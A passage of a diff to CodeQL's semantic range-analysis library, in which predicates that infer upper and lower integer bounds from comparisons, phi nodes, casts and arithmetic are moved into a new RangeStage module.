_, _, _) or guard = semEqFlowCond(_, _, _, _, _) - } -} - -private import RangeAnalysisCache -import RangeAnalysisPublic - -/** - * Holds if `b + delta` is a valid bound for `e` and this is the best such delta. - * - `upper = true` : `e <= b + delta` - * - `upper = false` : `e >= b + delta` - */ -private predicate bestBound(SemExpr e, SemBound b, int delta, boolean upper) { - delta = min(int d | bounded(e, b, d, upper, _, _, _)) and upper = true - or - delta = max(int d | bounded(e, b, d, upper, _, _, _)) and upper = false -} - -/** - * Holds if `comp` corresponds to: - * - `upper = true` : `v <= e + delta` or `v < e + delta` - * - `upper = false` : `v >= e + delta` or `v > e + delta` - */ -private predicate boundCondition( - SemRelationalExpr comp, SemSsaVariable v, SemExpr e, int delta, boolean upper -) { - comp.getLesserOperand() = semSsaRead(v, delta) and e = comp.getGreaterOperand() and upper = true - or - comp.getGreaterOperand() = semSsaRead(v, delta) and e = comp.getLesserOperand() and upper = false - or - exists(SemSubExpr sub, SemConstantIntegerExpr c, int d | - // (v - d) - e < c - comp.getLesserOperand() = sub and - comp.getGreaterOperand() = c and - sub.getLeftOperand() = semSsaRead(v, d) and - sub.getRightOperand() = e and - upper = true and - delta = d + c.getIntValue() - or - // (v - d) - e > c - comp.getGreaterOperand() = sub and - comp.getLesserOperand() = c and - sub.getLeftOperand() = semSsaRead(v, d) and - sub.getRightOperand() = e and - upper = false and - delta = d + c.getIntValue() - or - // e - (v - d) < c - comp.getLesserOperand() = sub and - comp.getGreaterOperand() = c and - sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, d) and - upper = false and - delta = d - c.getIntValue() - or - // e - (v - d) > c - comp.getGreaterOperand() = sub and - comp.getLesserOperand() = c and - sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, d) and - upper = true and - delta = d - c.getIntValue() - ) -} - -/** - * Holds if `comp` is a comparison between `x` and `y` for which `y - x` has a - * fixed value modulo some `mod > 1`, such that the comparison can be - * strengthened by `strengthen` when evaluating to `testIsTrue`. - */ -private predicate modulusComparison(SemRelationalExpr comp, boolean testIsTrue, int strengthen) { - exists( - SemBound b, int v1, int v2, int mod1, int mod2, int mod, boolean resultIsStrict, int d, int k - | - // If `x <= y` and `x =(mod) b + v1` and `y =(mod) b + v2` then - // `0 <= y - x =(mod) v2 - v1`. By choosing `k =(mod) v2 - v1` with - // `0 <= k < mod` we get `k <= y - x`. If the resulting comparison is - // strict then the strengthening amount is instead `k - 1` modulo `mod`: - // `x < y` means `0 <= y - x - 1 =(mod) k - 1` so `k - 1 <= y - x - 1` and - // thus `k - 1 < y - x` with `0 <= k - 1 < mod`. - semExprModulus(comp.getLesserOperand(), b, v1, mod1) and - semExprModulus(comp.getGreaterOperand(), b, v2, mod2) and - mod = mod1.gcd(mod2) and - mod != 1 and - (testIsTrue = true or testIsTrue = false) and - ( - if comp.isStrict() - then resultIsStrict = testIsTrue - else resultIsStrict = testIsTrue.booleanNot() - ) and - ( - resultIsStrict = true and d = 1 - or - resultIsStrict = false and d = 0 - ) and - ( - testIsTrue = true and k = v2 - v1 - or - testIsTrue = false and k = v1 - v2 - ) and - strengthen = (((k - d) % mod) + mod) % mod - ) -} - -/** - * Gets a condition that tests whether `v` is bounded by `e + delta`. - * - * If the condition evaluates to `testIsTrue`: - * - `upper = true` : `v <= e + delta` - * - `upper = false` : `v >= e + delta` - */ -private SemGuard boundFlowCond( - SemSsaVariable v, SemExpr e, int delta, boolean upper, boolean testIsTrue -) { - exists( - SemRelationalExpr comp, int d1, int d2, int d3, int strengthen, boolean compIsUpper, - boolean resultIsStrict - | - comp = result.asExpr() and - boundCondition(comp, v, e, d1, compIsUpper) and - (testIsTrue = true or testIsTrue = false) and - upper = compIsUpper.booleanXor(testIsTrue.booleanNot()) and - ( - if comp.isStrict() - then resultIsStrict = testIsTrue - else resultIsStrict = testIsTrue.booleanNot() - ) and - ( - if - getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or - getTrackedTypeForSsaVariable(v) instanceof SemAddressType - then - upper = true and strengthen = -1 - or - upper = false and strengthen = 1 - else strengthen = 0 - ) and - ( - exists(int k | modulusComparison(comp, testIsTrue, k) and d2 = strengthen * k) - or - not modulusComparison(comp, testIsTrue, _) and d2 = 0 - ) and - // A strict inequality `x < y` can be strengthened to `x <= y - 1`. - ( - resultIsStrict = true and d3 = strengthen - or - resultIsStrict = false and d3 = 0 - ) and - delta = d1 + d2 + d3 - ) - or - exists(boolean testIsTrue0 | - semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) - ) - or - result = semEqFlowCond(v, e, delta, true, testIsTrue) and - (upper = true or upper = false) - or - // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and - // exists a guard `guardEq` such that `v = v2 - d1 + d2`. - exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, int d1, int d2 | - guardEq = semEqFlowCond(v, semSsaRead(v2, d1), d2, true, eqIsTrue) and - result = boundFlowCond(v2, e, delta + d1 - d2, upper, testIsTrue) and - // guardEq needs to control guard - guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) - ) -} - -private newtype TSemReason = - TSemNoReason() or - TSemCondReason(SemGuard guard) { possibleReason(guard) } - -/** - * A reason for an inferred bound. This can either be `CondReason` if the bound - * is due to a specific condition, or `NoReason` if the bound is inferred - * without going through a bounding condition. - */ -abstract class SemReason extends TSemReason { - /** Gets a textual representation of this reason. */ - abstract string toString(); -} - -/** - * A reason for an inferred bound that indicates that the bound is inferred - * without going through a bounding condition. - */ -class SemNoReason extends SemReason, TSemNoReason { - override string toString() { result = "NoReason" } -} - -/** A reason for an inferred bound pointing to a condition. */ -class SemCondReason extends SemReason, TSemCondReason { - /** Gets the condition that is the reason for the bound. */ - SemGuard getCond() { this = TSemCondReason(result) } - - override string toString() { result = getCond().toString() } -} - -/** - * Holds if `e + delta` is a valid bound for `v` at `pos`. - * - `upper = true` : `v <= e + delta` - * - `upper = false` : `v >= e + delta` - */ -private predicate boundFlowStepSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, boolean upper, SemReason reason -) { - semSsaUpdateStep(v, e, delta) and - pos.hasReadOfVar(v) and - (upper = true or upper = false) and - reason = TSemNoReason() - or - exists(SemGuard guard, boolean testIsTrue | - pos.hasReadOfVar(v) and - guard = boundFlowCond(v, e, delta, upper, testIsTrue) and - semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and - reason = TSemCondReason(guard) - ) -} - -/** Holds if `v != e + delta` at `pos` and `v` is of integral type. */ -private predicate unequalFlowStepIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, SemReason reason -) { - getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and - exists(SemGuard guard, boolean testIsTrue | - pos.hasReadOfVar(v) and - guard = semEqFlowCond(v, e, delta, false, testIsTrue) and - semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and - reason = TSemCondReason(guard) - ) -} /** * An expression that does conversion, boxing, or unboxing @@ -385,448 +129,711 @@ private class NarrowingCastExpr extends ConvertOrBoxExpr { int getUpperBound() { typeBound(getTrackedType(this), _, result) } } -/** Holds if `e >= 1` as determined by sign analysis. */ -private predicate strictlyPositiveIntegralExpr(SemExpr e) { - semStrictlyPositive(e) and getTrackedType(e) instanceof SemIntegerType -} +signature module RangeSig { } -/** Holds if `e <= -1` as determined by sign analysis. */ -private predicate strictlyNegativeIntegralExpr(SemExpr e) { - semStrictlyNegative(e) and getTrackedType(e) instanceof SemIntegerType -} +module RangeStage { + cached + private module RangeAnalysisCache { + cached + module RangeAnalysisPublic { + /** + * Holds if `b + delta` is a valid bound for `e`. + * - `upper = true` : `e <= b + delta` + * - `upper = false` : `e >= b + delta` + * + * The reason for the bound is given by `reason` and may be either a condition + * or `NoReason` if the bound was proven directly without the use of a bounding + * condition. + */ + cached + predicate semBounded(SemExpr e, SemBound b, int delta, boolean upper, SemReason reason) { + bounded(e, b, delta, upper, _, _, reason) and + bestBound(e, b, delta, upper) + } + } -/** - * Holds if `e1 + delta` is a valid bound for `e2`. - * - `upper = true` : `e2 <= e1 + delta` - * - `upper = false` : `e2 >= e1 + delta` - */ -private predicate boundFlowStep(SemExpr e2, SemExpr e1, int delta, boolean upper) { - semValueFlowStep(e2, e1, delta) and - (upper = true or upper = false) - or - e2.(SafeCastExpr).getOperand() = e1 and - delta = 0 and - (upper = true or upper = false) - or - exists(SemExpr x | e2.(SemAddExpr).hasOperands(e1, x) | - // `x instanceof ConstantIntegerExpr` is covered by valueFlowStep - not x instanceof SemConstantIntegerExpr and - not e1 instanceof SemConstantIntegerExpr and - if strictlyPositiveIntegralExpr(x) - then upper = false and delta = 1 - else - if semPositive(x) - then upper = false and delta = 0 - else - if strictlyNegativeIntegralExpr(x) - then upper = true and delta = -1 - else - if semNegative(x) - then upper = true and delta = 0 - else none() - ) - or - exists(SemExpr x, SemSubExpr sub | - e2 = sub and - sub.getLeftOperand() = e1 and - sub.getRightOperand() = x - | - // `x instanceof ConstantIntegerExpr` is covered by valueFlowStep - not x instanceof SemConstantIntegerExpr and - if strictlyPositiveIntegralExpr(x) - then upper = true and delta = -1 - else - if semPositive(x) - then upper = true and delta = 0 - else - if strictlyNegativeIntegralExpr(x) - then upper = false and delta = 1 - else - if semNegative(x) - then upper = false and delta = 0 - else none() - ) - or - e2.(SemRemExpr).getRightOperand() = e1 and - semPositive(e1) and - delta = -1 and - upper = true - or - e2.(SemRemExpr).getLeftOperand() = e1 and semPositive(e1) and delta = 0 and upper = true - or - e2.(SemBitAndExpr).getAnOperand() = e1 and - semPositive(e1) and - delta = 0 and - upper = true - or - e2.(SemBitOrExpr).getAnOperand() = e1 and - semPositive(e2) and - delta = 0 and - upper = false - or - Specific::hasBound(e2, e1, delta, upper) -} + /** + * Holds if `guard = boundFlowCond(_, _, _, _, _) or guard = eqFlowCond(_, _, _, _, _)`. + */ + cached + predicate possibleReason(SemGuard guard) { + guard = boundFlowCond(_, _, _, _, _) or guard = semEqFlowCond(_, _, _, _, _) + } + } -/** Holds if `e2 = e1 * factor` and `factor > 0`. */ -private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, int factor) { - exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | - e2.(SemMulExpr).hasOperands(e1, c) and factor = k + private import RangeAnalysisCache + import RangeAnalysisPublic + + /** + * Holds if `b + delta` is a valid bound for `e` and this is the best such delta. + * - `upper = true` : `e <= b + delta` + * - `upper = false` : `e >= b + delta` + */ + private predicate bestBound(SemExpr e, SemBound b, int delta, boolean upper) { + delta = min(int d | bounded(e, b, d, upper, _, _, _)) and upper = true or - exists(SemShiftLeftExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) - ) - ) -} + delta = max(int d | bounded(e, b, d, upper, _, _, _)) and upper = false + } -/** - * Holds if `e2 = e1 / factor` and `factor > 0`. - * - * This conflates division, right shift, and unsigned right shift and is - * therefore only valid for non-negative numbers. - */ -private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, int factor) { - exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | - exists(SemDivExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = k - ) + /** + * Holds if `comp` corresponds to: + * - `upper = true` : `v <= e + delta` or `v < e + delta` + * - `upper = false` : `v >= e + delta` or `v > e + delta` + */ + private predicate boundCondition( + SemRelationalExpr comp, SemSsaVariable v, SemExpr e, int delta, boolean upper + ) { + comp.getLesserOperand() = semSsaRead(v, delta) and e = comp.getGreaterOperand() and upper = true or - exists(SemShiftRightExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) - ) + comp.getGreaterOperand() = semSsaRead(v, delta) and + e = comp.getLesserOperand() and + upper = false or - exists(SemShiftRightUnsignedExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) - ) - ) -} - -/** - * Holds if `b + delta` is a valid bound for `v` at `pos`. - * - `upper = true` : `v <= b + delta` - * - `upper = false` : `v >= b + delta` - */ -private predicate boundedSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, boolean upper, - boolean fromBackEdge, int origdelta, SemReason reason -) { - exists(SemExpr mid, int d1, int d2, SemReason r1, SemReason r2 | - boundFlowStepSsa(v, pos, mid, d1, upper, r1) and - bounded(mid, b, d2, upper, fromBackEdge, origdelta, r2) and - // upper = true: v <= mid + d1 <= b + d1 + d2 = b + delta - // upper = false: v >= mid + d1 >= b + d1 + d2 = b + delta - delta = d1 + d2 and - (if r1 instanceof SemNoReason then reason = r2 else reason = r1) - ) - or - exists(int d, SemReason r1, SemReason r2 | - boundedSsa(v, pos, b, d, upper, fromBackEdge, origdelta, r2) or - boundedPhi(v, b, d, upper, fromBackEdge, origdelta, r2) - | - unequalIntegralSsa(v, pos, b, d, r1) and - ( - upper = true and delta = d - 1 + exists(SemSubExpr sub, SemConstantIntegerExpr c, int d | + // (v - d) - e < c + comp.getLesserOperand() = sub and + comp.getGreaterOperand() = c and + sub.getLeftOperand() = semSsaRead(v, d) and + sub.getRightOperand() = e and + upper = true and + delta = d + c.getIntValue() or - upper = false and delta = d + 1 - ) and - ( - reason = r1 + // (v - d) - e > c + comp.getGreaterOperand() = sub and + comp.getLesserOperand() = c and + sub.getLeftOperand() = semSsaRead(v, d) and + sub.getRightOperand() = e and + upper = false and + delta = d + c.getIntValue() or - reason = r2 and not r2 instanceof SemNoReason - ) - ) -} - -/** - * Holds if `v != b + delta` at `pos` and `v` is of integral type. - */ -private predicate unequalIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, SemReason reason -) { - exists(SemExpr e, int d1, int d2 | - unequalFlowStepIntegralSsa(v, pos, e, d1, reason) and - boundedUpper(e, b, d1) and - boundedLower(e, b, d2) and - delta = d2 + d1 - ) -} - -/** - * Holds if `b + delta` is an upper bound for `e`. - * - * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. - */ -pragma[nomagic] -private predicate boundedUpper(SemExpr e, SemBound b, int delta) { - bounded(e, b, delta, true, _, _, _) -} - -/** - * Holds if `b + delta` is a lower bound for `e`. - * - * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. - */ -pragma[nomagic] -private predicate boundedLower(SemExpr e, SemBound b, int delta) { - bounded(e, b, delta, false, _, _, _) -} - -/** Weakens a delta to lie in the range `[-1..1]`. */ -bindingset[delta, upper] -private int weakenDelta(boolean upper, int delta) { - delta in [-1 .. 1] and result = delta - or - upper = true and result = -1 and delta < -1 - or - upper = false and result = 1 and delta > 1 -} - -/** - * Holds if `b + delta` is a valid bound for `inp` when used as an input to - * `phi` along `edge`. - * - `upper = true` : `inp <= b + delta` - * - `upper = false` : `inp >= b + delta` - */ -private predicate boundedPhiInp( - SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, SemBound b, int delta, - boolean upper, boolean fromBackEdge, int origdelta, SemReason reason -) { - edge.phiInput(phi, inp) and - exists(int d, boolean fromBackEdge0 | - boundedSsa(inp, edge, b, d, upper, fromBackEdge0, origdelta, reason) - or - boundedPhi(inp, b, d, upper, fromBackEdge0, origdelta, reason) - or - b.(SemSsaBound).getAVariable() = inp and - d = 0 and - (upper = true or upper = false) and - fromBackEdge0 = false and - origdelta = 0 and - reason = TSemNoReason() - | - if semBackEdge(phi, inp, edge) - then - fromBackEdge = true and - ( - fromBackEdge0 = true and delta = weakenDelta(upper, d - origdelta) + origdelta - or - fromBackEdge0 = false and delta = d - ) - else ( - delta = d and fromBackEdge = fromBackEdge0 - ) - ) -} - -/** - * Holds if `b + delta` is a valid bound for `inp` when used as an input to - * `phi` along `edge`. - * - `upper = true` : `inp <= b + delta` - * - `upper = false` : `inp >= b + delta` - * - * Equivalent to `boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _)`. - */ -pragma[noinline] -private predicate boundedPhiInp1( - SemSsaPhiNode phi, SemBound b, boolean upper, SemSsaVariable inp, - SemSsaReadPositionPhiInputEdge edge, int delta -) { - boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _) -} - -/** - * Holds if `phi` is a valid bound for `inp` when used as an input to `phi` - * along `edge`. - * - `upper = true` : `inp <= phi` - * - `upper = false` : `inp >= phi` - */ -private predicate selfBoundedPhiInp( - SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, boolean upper -) { - exists(int d, SemSsaBound phibound | - phibound.getAVariable() = phi and - boundedPhiInp(phi, inp, edge, phibound, d, upper, _, _, _) and - ( - upper = true and d <= 0 + // e - (v - d) < c + comp.getLesserOperand() = sub and + comp.getGreaterOperand() = c and + sub.getLeftOperand() = e and + sub.getRightOperand() = semSsaRead(v, d) and + upper = false and + delta = d - c.getIntValue() or - upper = false and d >= 0 + // e - (v - d) > c + comp.getGreaterOperand() = sub and + comp.getLesserOperand() = c and + sub.getLeftOperand() = e and + sub.getRightOperand() = semSsaRead(v, d) and + upper = true and + delta = d - c.getIntValue() ) - ) -} + } -/** - * Holds if `b + delta` is a valid bound for some input, `inp`, to `phi`, and - * thus a candidate bound for `phi`. - * - `upper = true` : `inp <= b + delta` - * - `upper = false` : `inp >= b + delta` - */ -pragma[noinline] -private predicate boundedPhiCand( - SemSsaPhiNode phi, boolean upper, SemBound b, int delta, boolean fromBackEdge, int origdelta, - SemReason reason -) { - exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | - boundedPhiInp(phi, inp, edge, b, delta, upper, fromBackEdge, origdelta, reason) - ) -} - -/** - * Holds if the candidate bound `b + delta` for `phi` is valid for the phi input - * `inp` along `edge`. - */ -private predicate boundedPhiCandValidForEdge( - SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge -) { - boundedPhiCand(phi, upper, b, delta, fromBackEdge, origdelta, reason) and - ( - exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = true and d <= delta) - or - exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = false and d >= delta) - or - selfBoundedPhiInp(phi, inp, edge, upper) - ) -} - -/** - * Holds if `b + delta` is a valid bound for `phi`. - * - `upper = true` : `phi <= b + delta` - * - `upper = false` : `phi >= b + delta` - */ -private predicate boundedPhi( - SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason -) { - forex(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | edge.phiInput(phi, inp) | - boundedPhiCandValidForEdge(phi, b, delta, upper, fromBackEdge, origdelta, reason, inp, edge) - ) -} - -/** - * Holds if `e` has an upper (for `upper = true`) or lower - * (for `upper = false`) bound of `b`. - */ -private predicate baseBound(SemExpr e, int b, boolean upper) { - Specific::hasConstantBound(e, b, upper) - or - upper = false and - b = 0 and - semPositive(e.(SemBitAndExpr).getAnOperand()) and - // REVIEW: We let the language opt out here to preserve original results. - not Specific::ignoreZeroLowerBound(e) -} - -/** - * Holds if the value being cast has an upper (for `upper = true`) or lower - * (for `upper = false`) bound within the bounds of the resulting type. - * For `upper = true` this means that the cast will not overflow and for - * `upper = false` this means that the cast will not underflow. - */ -private predicate safeNarrowingCast(NarrowingCastExpr cast, boolean upper) { - exists(int bound | bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) | - upper = true and bound <= cast.getUpperBound() - or - upper = false and bound >= cast.getLowerBound() - ) -} - -pragma[noinline] -private predicate boundedCastExpr( - NarrowingCastExpr cast, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason -) { - bounded(cast.getOperand(), b, delta, upper, fromBackEdge, origdelta, reason) -} - -/** - * Holds if `b + delta` is a valid bound for `e`. - * - `upper = true` : `e <= b + delta` - * - `upper = false` : `e >= b + delta` - */ -private predicate bounded( - SemExpr e, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason -) { - not Specific::ignoreExprBound(e) and - ( - e = b.getExpr(delta) and - (upper = true or upper = false) and - fromBackEdge = false and - origdelta = delta and - reason = TSemNoReason() - or - baseBound(e, delta, upper) and - b instanceof SemZeroBound and - fromBackEdge = false and - origdelta = delta and - reason = TSemNoReason() - or - exists(SemSsaVariable v, SemSsaReadPositionBlock bb | - boundedSsa(v, bb, b, delta, upper, fromBackEdge, origdelta, reason) and - e = v.getAUse() and - bb.getBlock() = e.getBasicBlock() - ) - or - exists(SemExpr mid, int d1, int d2 | - boundFlowStep(e, mid, d1, upper) and - // Constants have easy, base-case bounds, so let's not infer any recursive bounds. - not e instanceof SemConstantIntegerExpr and - bounded(mid, b, d2, upper, fromBackEdge, origdelta, reason) and - // upper = true: e <= mid + d1 <= b + d1 + d2 = b + delta - // upper = false: e >= mid + d1 >= b + d1 + d2 = b + delta - delta = d1 + d2 - ) - or - exists(SemSsaPhiNode phi | - boundedPhi(phi, b, delta, upper, fromBackEdge, origdelta, reason) and - e = phi.getAUse() - ) - or - exists(SemExpr mid, int factor, int d | - boundFlowStepMul(e, mid, factor) and - not e instanceof SemConstantIntegerExpr and - bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and - b instanceof SemZeroBound and - delta = d * factor - ) - or - exists(SemExpr mid, int factor, int d | - boundFlowStepDiv(e, mid, factor) and - not e instanceof SemConstantIntegerExpr and - bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and - b instanceof SemZeroBound and - d >= 0 and - delta = d / factor - ) - or - exists(NarrowingCastExpr cast | - cast = e and - safeNarrowingCast(cast, upper.booleanNot()) and - boundedCastExpr(cast, b, delta, upper, fromBackEdge, origdelta, reason) - ) - or + /** + * Holds if `comp` is a comparison between `x` and `y` for which `y - x` has a + * fixed value modulo some `mod > 1`, such that the comparison can be + * strengthened by `strengthen` when evaluating to `testIsTrue`. + */ + private predicate modulusComparison(SemRelationalExpr comp, boolean testIsTrue, int strengthen) { exists( - SemConditionalExpr cond, int d1, int d2, boolean fbe1, boolean fbe2, int od1, int od2, - SemReason r1, SemReason r2 + SemBound b, int v1, int v2, int mod1, int mod2, int mod, boolean resultIsStrict, int d, int k | - cond = e and - boundedConditionalExpr(cond, b, upper, true, d1, fbe1, od1, r1) and - boundedConditionalExpr(cond, b, upper, false, d2, fbe2, od2, r2) and + // If `x <= y` and `x =(mod) b + v1` and `y =(mod) b + v2` then + // `0 <= y - x =(mod) v2 - v1`. By choosing `k =(mod) v2 - v1` with + // `0 <= k < mod` we get `k <= y - x`. If the resulting comparison is + // strict then the strengthening amount is instead `k - 1` modulo `mod`: + // `x < y` means `0 <= y - x - 1 =(mod) k - 1` so `k - 1 <= y - x - 1` and + // thus `k - 1 < y - x` with `0 <= k - 1 < mod`. + semExprModulus(comp.getLesserOperand(), b, v1, mod1) and + semExprModulus(comp.getGreaterOperand(), b, v2, mod2) and + mod = mod1.gcd(mod2) and + mod != 1 and + (testIsTrue = true or testIsTrue = false) and ( - delta = d1 and fromBackEdge = fbe1 and origdelta = od1 and reason = r1 + if comp.isStrict() + then resultIsStrict = testIsTrue + else resultIsStrict = testIsTrue.booleanNot() + ) and + ( + resultIsStrict = true and d = 1 or - delta = d2 and fromBackEdge = fbe2 and origdelta = od2 and reason = r2 - ) - | - upper = true and delta = d1.maximum(d2) - or - upper = false and delta = d1.minimum(d2) + resultIsStrict = false and d = 0 + ) and + ( + testIsTrue = true and k = v2 - v1 + or + testIsTrue = false and k = v1 - v2 + ) and + strengthen = (((k - d) % mod) + mod) % mod ) - ) -} + } -private predicate boundedConditionalExpr( - SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, int delta, - boolean fromBackEdge, int origdelta, SemReason reason -) { - bounded(cond.getBranchExpr(branch), b, delta, upper, fromBackEdge, origdelta, reason) + /** + * Gets a condition that tests whether `v` is bounded by `e + delta`. + * + * If the condition evaluates to `testIsTrue`: + * - `upper = true` : `v <= e + delta` + * - `upper = false` : `v >= e + delta` + */ + private SemGuard boundFlowCond( + SemSsaVariable v, SemExpr e, int delta, boolean upper, boolean testIsTrue + ) { + exists( + SemRelationalExpr comp, int d1, int d2, int d3, int strengthen, boolean compIsUpper, + boolean resultIsStrict + | + comp = result.asExpr() and + boundCondition(comp, v, e, d1, compIsUpper) and + (testIsTrue = true or testIsTrue = false) and + upper = compIsUpper.booleanXor(testIsTrue.booleanNot()) and + ( + if comp.isStrict() + then resultIsStrict = testIsTrue + else resultIsStrict = testIsTrue.booleanNot() + ) and + ( + if + getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or + getTrackedTypeForSsaVariable(v) instanceof SemAddressType + then + upper = true and strengthen = -1 + or + upper = false and strengthen = 1 + else strengthen = 0 + ) and + ( + exists(int k | modulusComparison(comp, testIsTrue, k) and d2 = strengthen * k) + or + not modulusComparison(comp, testIsTrue, _) and d2 = 0 + ) and + // A strict inequality `x < y` can be strengthened to `x <= y - 1`. + ( + resultIsStrict = true and d3 = strengthen + or + resultIsStrict = false and d3 = 0 + ) and + delta = d1 + d2 + d3 + ) + or + exists(boolean testIsTrue0 | + semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) + ) + or + result = semEqFlowCond(v, e, delta, true, testIsTrue) and + (upper = true or upper = false) + or + // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and + // exists a guard `guardEq` such that `v = v2 - d1 + d2`. + exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, int d1, int d2 | + guardEq = semEqFlowCond(v, semSsaRead(v2, d1), d2, true, eqIsTrue) and + result = boundFlowCond(v2, e, delta + d1 - d2, upper, testIsTrue) and + // guardEq needs to control guard + guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) + ) + } + + private newtype TSemReason = + TSemNoReason() or + TSemCondReason(SemGuard guard) { possibleReason(guard) } + + /** + * A reason for an inferred bound. This can either be `CondReason` if the bound + * is due to a specific condition, or `NoReason` if the bound is inferred + * without going through a bounding condition. + */ + abstract class SemReason extends TSemReason { + /** Gets a textual representation of this reason. */ + abstract string toString(); + } + + /** + * A reason for an inferred bound that indicates that the bound is inferred + * without going through a bounding condition. + */ + class SemNoReason extends SemReason, TSemNoReason { + override string toString() { result = "NoReason" } + } + + /** A reason for an inferred bound pointing to a condition. */ + class SemCondReason extends SemReason, TSemCondReason { + /** Gets the condition that is the reason for the bound. */ + SemGuard getCond() { this = TSemCondReason(result) } + + override string toString() { result = getCond().toString() } + } + + /** + * Holds if `e + delta` is a valid bound for `v` at `pos`. + * - `upper = true` : `v <= e + delta` + * - `upper = false` : `v >= e + delta` + */ + private predicate boundFlowStepSsa( + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, boolean upper, SemReason reason + ) { + semSsaUpdateStep(v, e, delta) and + pos.hasReadOfVar(v) and + (upper = true or upper = false) and + reason = TSemNoReason() + or + exists(SemGuard guard, boolean testIsTrue | + pos.hasReadOfVar(v) and + guard = boundFlowCond(v, e, delta, upper, testIsTrue) and + semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and + reason = TSemCondReason(guard) + ) + } + + /** Holds if `v != e + delta` at `pos` and `v` is of integral type. */ + private predicate unequalFlowStepIntegralSsa( + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, SemReason reason + ) { + getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and + exists(SemGuard guard, boolean testIsTrue | + pos.hasReadOfVar(v) and + guard = semEqFlowCond(v, e, delta, false, testIsTrue) and + semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and + reason = TSemCondReason(guard) + ) + } + + /** Holds if `e >= 1` as determined by sign analysis. */ + private predicate strictlyPositiveIntegralExpr(SemExpr e) { + semStrictlyPositive(e) and getTrackedType(e) instanceof SemIntegerType + } + + /** Holds if `e <= -1` as determined by sign analysis. */ + private predicate strictlyNegativeIntegralExpr(SemExpr e) { + semStrictlyNegative(e) and getTrackedType(e) instanceof SemIntegerType + } + + /** + * Holds if `e1 + delta` is a valid bound for `e2`. + * - `upper = true` : `e2 <= e1 + delta` + * - `upper = false` : `e2 >= e1 + delta` + */ + private predicate boundFlowStep(SemExpr e2, SemExpr e1, int delta, boolean upper) { + semValueFlowStep(e2, e1, delta) and + (upper = true or upper = false) + or + e2.(SafeCastExpr).getOperand() = e1 and + delta = 0 and + (upper = true or upper = false) + or + exists(SemExpr x | e2.(SemAddExpr).hasOperands(e1, x) | + // `x instanceof ConstantIntegerExpr` is covered by valueFlowStep + not x instanceof SemConstantIntegerExpr and + not e1 instanceof SemConstantIntegerExpr and + if strictlyPositiveIntegralExpr(x) + then upper = false and delta = 1 + else + if semPositive(x) + then upper = false and delta = 0 + else + if strictlyNegativeIntegralExpr(x) + then upper = true and delta = -1 + else + if semNegative(x) + then upper = true and delta = 0 + else none() + ) + or + exists(SemExpr x, SemSubExpr sub | + e2 = sub and + sub.getLeftOperand() = e1 and + sub.getRightOperand() = x + | + // `x instanceof ConstantIntegerExpr` is covered by valueFlowStep + not x instanceof SemConstantIntegerExpr and + if strictlyPositiveIntegralExpr(x) + then upper = true and delta = -1 + else + if semPositive(x) + then upper = true and delta = 0 + else + if strictlyNegativeIntegralExpr(x) + then upper = false and delta = 1 + else + if semNegative(x) + then upper = false and delta = 0 + else none() + ) + or + e2.(SemRemExpr).getRightOperand() = e1 and + semPositive(e1) and + delta = -1 and + upper = true + or + e2.(SemRemExpr).getLeftOperand() = e1 and semPositive(e1) and delta = 0 and upper = true + or + e2.(SemBitAndExpr).getAnOperand() = e1 and + semPositive(e1) and + delta = 0 and + upper = true + or + 